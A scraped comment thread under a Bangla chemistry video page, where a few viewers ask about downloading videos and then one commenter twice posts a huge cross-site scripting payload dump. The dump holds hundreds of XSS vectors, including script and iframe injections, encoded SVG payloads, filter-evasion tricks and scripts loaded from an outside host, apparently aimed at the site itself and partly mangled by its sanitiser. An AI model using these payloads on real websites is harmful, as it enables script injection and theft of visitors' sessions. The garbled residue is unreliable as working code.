9 

Qualitative Chemistry - Introduction

By Mahfuzul Hoque

Views:9843

Published date  Nov3 2014

Comments (7)

Sample Image

mohammad jonayed  2017-02-02

how can i download this vedios

Sample Image

Tapos  2017-07-14

I want to download this video

Sample Image

shiblust69  2018-10-22

ভাইয়া নিউ ভিডিও দিবেন কবে রসায়ন বিজ্ঞানের

Sample Image

shiblust69  2018-10-22

ভাইয়া নিউ ভিডিও দিবেন কবে রসায়ন বিজ্ঞানের

Sample Image

">  2018-11-11

">

Sample Image

">  2018-11-11

[removed alert(123);[removed] [removed]alert("XSS");[removed] [removed]alert(123)[removed] [removed]alert("hellox worldss");[removed] [removed]alert(�XSS�)[removed] [removed]alert(�XSS�);[removed] [removed]alert(�XSS�)[removed] �>[removed]alert(�XSS�)[removed] [removed]alert(/XSS�)[removed] [removed]alert(/XSS/)[removed] [removed][removed]alert(1)[removed] �; alert(1); �)alert(1);// [removed]alert(1)[removed] <iframe src=" [removed]prompt(1) "> <style>{font-family:'<iframe/>' <input/ <sVg>[removed alert(1) {Opera} [removed] [removed]prompt(1)[removed] [removed]/**/alert(1)/**/[removed] <iframe/src=[removed]PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" ;>X <form><textarea > [removed]/***/confirm('uFF41uFF4CuFF45uFF52uFF54u1455uFF11u1450')/***/[removed]'> X [removed]alert(0%0)[removed] <style/ > alert (1)> <///style///><span / >SPAN <style>{-o-link-source:'<body/>' <blink/ >OnMouseOver {Firefox & Opera} ^ _^

X
IE7} <iframe// src=javaSCRIPT:alert(1) //<form/acti><input type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/ /*iframe src*/> //|\ [removed] //|\ [removed]/<style>{src:'<style/>'/</style> <input type="X"> </plaintext></|><plaintext/ </svg>' [removed]alert(1) {Opera}
DIV
<iframe onmouseover "prompt(1)"> X <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> On Mouse Over Click Here <%<!--'%>[removed]alert(1);[removed]">X[removed] alert(1) ClickMe [removed] alert(1) [removed] > <--` -- > [removed]</object> <iframe src=[removed]PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <IFRAME SRC="[removed]alert('XSS');"></IFRAME> <EMBED SRC=[removed]PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> [removed]" SRC="http://ha.ckers.org/xss.js">[removed] [removed]" '' SRC="http://ha.ckers.org/xss.js">[removed] [removed]'" SRC="http://ha.ckers.org/xss.js">[removed] [removed]'>" SRC="http://ha.ckers.org/xss.js">[removed] [removed][removed]("[removed] <[removed]alert("XSS");//<[removed] <"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->[removed]">'>[removed]alert(String.fromCharCode(88,83,83))[removed] ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->[removed]">'>[removed]alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit;.x=27&submit;.y=9&cmd=search [removed]alert("hellox worldss")[removed]&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 [removed]alert("XSS");[removed]&search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//";alert(String.fromCharCode(88,83,83)%?29//-->[removed]">'>[removed]alert(String.fromCharCode(88,83%?2C83))[removed]&submit-frmGoogleWeb=Web+Search

hellox worldss

<BODY worldss )> <input autofocus> <input autofocus><input autofocus> <body ><br>




. .



<input autofocus> <form><button >lol <!-- <style><img > <? foo="><script>alert(1)</script>"> <? foo="><x foo='?><script>alert(1)</script>'>"> <% foo>
LOL LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style> [removed]({0:#0=alert/#0#/#0#(0)})[removed] LOL removed]alert(123)[removed] <SCRIPT>alert(/XSS/.source)</SCRIPT> \";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <BODY < IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" C REL stylesheet"> <STYLE>BODY{[removed]:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <XSS url xss.htc);"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox(\"XSS\")'> <IMG SRC="mocha:[code]"> <IMG SRC="livescript:[code]"> �scriptualert(EXSSE)�/scriptu <META HTTP-EQUIV="refresh" C < META HTTP-EQUIV="refresh" C < META HTTP-EQUIV="refresh" C URL http://;URL=javascript:alert('XSS');" <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV url javascript:alert('XSS'))"> <DIV 07507206C028'06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029'029"> <DIV url javascript:alert('XSS'))"> <DIV [removed alert('XSS'));"> <STYLE>@import'javascript:alert("XSS")';</STYLE> <IMG < XSS exp *<A > <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--> <BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> a="get"; b="URL(\""; c="javascript:"; d="alert('XSS');\")"; eval(a+b+c+d); <HTML xmlns:xss><?import namespace="xss" implementati < XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <XML SRC="xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementati < t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"> </BODY></HTML> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)'; echo('IPT>alert("XSS")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> [removed] /a.jpg http://victimsite.com/admin.asp&deleteuser; <META HTTP-EQUIV="Set-Cookie" C < HEAD><META HTTP-EQUIV="CONTENT-TYPE" C charset UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://www.google.com">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6 6.000146.0x7.147/">XSS</A> <A HREF="//www.google.com/">XSS</A> <A HREF="//google">XSS</A> <A HREF="http://ha.ckers.org@google">XSS</A> <A HREF="http://google:ha.ckers.org">XSS</A> <A HREF="http://google.com/">XSS</A> <A HREF="http://www.google.com./">XSS</A> <A HREF="javascript:document.locati >XSS</A> <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < x3c x3C u003c u003C <iframe src=http://ha.ckers.org/scriptlet.html> <IMG SRC="javascript:alert('XSS')" <SCRIPT SRC=//ha.ckers.org/.js> <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <IMG SRC=" javascript:alert('XSS');"> perl -e 'print "<SCRIPT>alert(\"XSS\")</SCRIPT>";' > out perl -e 'print "<IMG SRC=javascript:alert(\"XSS\")>";' > out <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <IMG SRC=javascript:alert("XSS")> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC="javascript:alert('XSS');"> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> '';!--"<XSS>=&{()} ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->[removed]">'>[removed]alert(String.fromCharCode(88,83,83))[removed] '';!--"[removed]=&{()} [removed][removed] [removed]alert("XSS")[removed]"> [removed][removed] [removed][removed] <[removed]alert("XSS");//<[removed] [removed]a=/XSS/alert(a.source)[removed] ";alert('XSS');// </TITLE>[removed]alert("XSS");[removed] �script�alert(�XSS�)�/script� <META HTTP-EQUIV="refresh" C> <IFRAME SRC="[removed]alert('XSS');"></IFRAME> <FRAMESET><FRAME SRC="[removed]alert('XSS');"></FRAMESET>
<STYLE>@im port'javascript:alert("XSS")';</STYLE> removed] exp/* <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e); [removed][removed] <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementati></BODY></HTML> [removed][removed]("[removed] <form id="test" /><button form="test" >TESTHTML FORMACTION <form><button >crosssitespt <frameset > lt;!-- <style><img > <object data=[removed]PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> <embed src=[removed]PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> <embed src="[removed]alert(1)"> <? foo="><script>alert(1)</script>"> [removed]({0:#0=alert/#0#/#0#(123)})[removed] [removed]ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x[removed] [removed]Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()[removed] [removed]{alert(1)}[removed];1 [removed]crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')[removed] [removed alert(1)[removed] <iframe src "[removed]alert(1)"></iframe> +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %3cscript%3ealert([removed])%3c/script%3e �>alert([removed])[removed] �>[removed]alert([removed])[removed] �><[removed]alert([removed]);//<[removed] foo[removed]alert([removed])[removed] alert([removed]) "/><BODY src http://my.box.com/xss.js>[removed]")�> �; alert([removed]); var foo=� foo�; alert([removed]);//�; [removed][removed]alert([removed])[removed] <BODY > removed]alert(1)[removed] ">[removed]alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))[removed] <video src=1 > <audio src=1 >

Sample Image

">  2018-11-11

[removed alert(123);[removed] [removed]alert("XSS");[removed] [removed]alert(123)[removed] [removed]alert("hellox worldss");[removed] [removed]alert(�XSS�)[removed] [removed]alert(�XSS�);[removed] [removed]alert(�XSS�)[removed] �>[removed]alert(�XSS�)[removed] [removed]alert(/XSS�)[removed] [removed]alert(/XSS/)[removed] [removed][removed]alert(1)[removed] �; alert(1); �)alert(1);// [removed]alert(1)[removed] <iframe src=" [removed]prompt(1) "> <style>{font-family:'<iframe/>' <input/ <sVg>[removed alert(1) {Opera} [removed] [removed]prompt(1)[removed] [removed]/**/alert(1)/**/[removed] <iframe/src=[removed]PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" ;>X <form><textarea > [removed]/***/confirm('uFF41uFF4CuFF45uFF52uFF54u1455uFF11u1450')/***/[removed]'> X [removed]alert(0%0)[removed] <style/ > alert (1)> <///style///><span / >SPAN <style>{-o-link-source:'<body/>' <blink/ >OnMouseOver {Firefox & Opera} ^ _^

X
IE7} <iframe// src=javaSCRIPT:alert(1) //<form/acti><input type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/ /*iframe src*/> //|\ [removed] //|\ [removed]/<style>{src:'<style/>'/</style> <input type="X"> </plaintext></|><plaintext/ </svg>' [removed]alert(1) {Opera}
DIV
<iframe onmouseover "prompt(1)"> X <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> On Mouse Over Click Here <%<!--'%>[removed]alert(1);[removed]">X[removed] alert(1) ClickMe [removed] alert(1) [removed] > <--` -- > [removed]</object> <iframe src=[removed]PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <IFRAME SRC="[removed]alert('XSS');"></IFRAME> <EMBED SRC=[removed]PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> [removed]" SRC="http://ha.ckers.org/xss.js">[removed] [removed]" '' SRC="http://ha.ckers.org/xss.js">[removed] [removed]'" SRC="http://ha.ckers.org/xss.js">[removed] [removed]'>" SRC="http://ha.ckers.org/xss.js">[removed] [removed][removed]("[removed] <[removed]alert("XSS");//<[removed] <"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->[removed]">'>[removed]alert(String.fromCharCode(88,83,83))[removed] ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->[removed]">'>[removed]alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit;.x=27&submit;.y=9&cmd=search [removed]alert("hellox worldss")[removed]&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 [removed]alert("XSS");[removed]&search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//";alert(String.fromCharCode(88,83,83)%?29//-->[removed]">'>[removed]alert(String.fromCharCode(88,83%?2C83))[removed]&submit-frmGoogleWeb=Web+Search

hellox worldss

<BODY worldss )> <input autofocus> <input autofocus><input autofocus> <body ><br>




. .



<input autofocus> <form><button >lol <!-- <style><img > <? foo="><script>alert(1)</script>"> <? foo="><x foo='?><script>alert(1)</script>'>"> <% foo>
LOL LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style> [removed]({0:#0=alert/#0#/#0#(0)})[removed] LOL removed]alert(123)[removed] <SCRIPT>alert(/XSS/.source)</SCRIPT> \";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <BODY < IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" C REL stylesheet"> <STYLE>BODY{[removed]:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <XSS url xss.htc);"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox(\"XSS\")'> <IMG SRC="mocha:[code]"> <IMG SRC="livescript:[code]"> �scriptualert(EXSSE)�/scriptu <META HTTP-EQUIV="refresh" C < META HTTP-EQUIV="refresh" C < META HTTP-EQUIV="refresh" C URL http://;URL=javascript:alert('XSS');" <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV url javascript:alert('XSS'))"> <DIV 07507206C028'06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029'029"> <DIV url javascript:alert('XSS'))"> <DIV [removed alert('XSS'));"> <STYLE>@import'javascript:alert("XSS")';</STYLE> <IMG < XSS exp *<A > <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--> <BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> a="get"; b="URL(\""; c="javascript:"; d="alert('XSS');\")"; eval(a+b+c+d); <HTML xmlns:xss><?import namespace="xss" implementati < XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <XML SRC="xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementati < t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"> </BODY></HTML> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)'; echo('IPT>alert("XSS")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> [removed] /a.jpg http://victimsite.com/admin.asp&deleteuser; <META HTTP-EQUIV="Set-Cookie" C < HEAD><META HTTP-EQUIV="CONTENT-TYPE" C charset UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://www.google.com">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6 6.000146.0x7.147/">XSS</A> <A HREF="//www.google.com/">XSS</A> <A HREF="//google">XSS</A> <A HREF="http://ha.ckers.org@google">XSS</A> <A HREF="http://google:ha.ckers.org">XSS</A> <A HREF="http://google.com/">XSS</A> <A HREF="http://www.google.com./">XSS</A> <A HREF="javascript:document.locati >XSS</A> <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < x3c x3C u003c u003C <iframe src=http://ha.ckers.org/scriptlet.html> <IMG SRC="javascript:alert('XSS')" <SCRIPT SRC=//ha.ckers.org/.js> <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <IMG SRC=" javascript:alert('XSS');"> perl -e 'print "<SCRIPT>alert(\"XSS\")</SCRIPT>";' > out perl -e 'print "<IMG SRC=javascript:alert(\"XSS\")>";' > out <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <IMG SRC=javascript:alert("XSS")> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC="javascript:alert('XSS');"> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> '';!--"<XSS>=&{()} ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->[removed]">'>[removed]alert(String.fromCharCode(88,83,83))[removed] '';!--"[removed]=&{()} [removed][removed] [removed]alert("XSS")[removed]"> [removed][removed] [removed][removed] <[removed]alert("XSS");//<[removed] [removed]a=/XSS/alert(a.source)[removed] ";alert('XSS');// </TITLE>[removed]alert("XSS");[removed] �script�alert(�XSS�)�/script� <META HTTP-EQUIV="refresh" C> <IFRAME SRC="[removed]alert('XSS');"></IFRAME> <FRAMESET><FRAME SRC="[removed]alert('XSS');"></FRAMESET>
<STYLE>@im port'javascript:alert("XSS")';</STYLE> removed] exp/* <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e); [removed][removed] <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementati></BODY></HTML> [removed][removed]("[removed] <form id="test" /><button form="test" >TESTHTML FORMACTION <form><button >crosssitespt <frameset > lt;!-- <style><img > <object data=[removed]PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> <embed src=[removed]PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> <embed src="[removed]alert(1)"> <? foo="><script>alert(1)</script>"> [removed]({0:#0=alert/#0#/#0#(123)})[removed] [removed]ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x[removed] [removed]Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()[removed] [removed]{alert(1)}[removed];1 [removed]crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')[removed] [removed alert(1)[removed] <iframe src "[removed]alert(1)"></iframe> +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %3cscript%3ealert([removed])%3c/script%3e �>alert([removed])[removed] �>[removed]alert([removed])[removed] �><[removed]alert([removed]);//<[removed] foo[removed]alert([removed])[removed] alert([removed]) "/><BODY src http://my.box.com/xss.js>[removed]")�> �; alert([removed]); var foo=� foo�; alert([removed]);//�; [removed][removed]alert([removed])[removed] <BODY > removed]alert(1)[removed] ">[removed]alert(String.fromCharCode(66, 108, 65, 99, 75, 